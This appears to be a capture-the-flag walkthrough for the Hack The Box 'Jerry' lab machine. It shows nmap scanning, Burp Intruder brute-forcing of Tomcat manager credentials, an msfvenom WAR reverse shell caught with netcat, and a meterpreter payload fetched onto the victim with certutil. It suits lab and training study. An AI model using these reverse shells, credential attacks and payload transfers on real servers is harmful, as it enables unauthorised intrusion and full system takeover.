HTB - 5. Jerry (Default Credentials)

  1. nmap -T4 -p- -A shows 8080 open with Apache Tomcat/Coyote JSP engine 1.1 and Tomcat version 7.0.88

  2. Go to and shwos Apache Tomcat default page

  3. Search tomcat default credentials and found

  4. Burp Suite

    1. Click server management page

    2. Try login with tomcat:tomcat

    3. Send to decoder

    4. Select authorization basic and decode as base64

    5. Forwarded and did not work

    6. Try again and sent to repeater and intruder

  5. Create passwords

    1. Get from the url and replace " " with ":".

    2. Write bash script to base64 encode all the credentials

      for cred in $(cat tomcat.txt); do echo -n $cred | base64; done
  6. Back to Burp Suite Intruder

    1. Set to sniper attack

    2. Select the authorization basic

    3. Paste in list of base64 encoded usernames and passwords into Payloads/Payload Options

    4. Disable URL encoder

    5. Run and see much longer length code 200 for the successful credientials: tomcat:s3cret

  7. Create WAR file exploit

    1. Search tomcat war reverse shell msfvenom:

    2. msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4444 -f war > shell.war which will try to connect to our computer on port 4444

    3. nc -nvlp 4444 to listen on port 4444

    4. Upload to tomcat managment server and deploy

    5. Go to /shell and got nt authoirty/system

    cd c:\users\administrator
    cd Desktop
    cd flags
    arp -a
  8. New reverse shell Create payload:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=5555 -f exe > sh.exe

    Listen on port 5555:

    sudo msfconsole
    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set LHOST
    set LPORT 5555

    Transfer file to windows:

    python -m SimpleHTTPServer 80 <-- start server on attacker
    certutil -urlcache -f c:\users\administrator\desktop\flags\sh.exe <-- On victim

    Result: shell popped

Last updated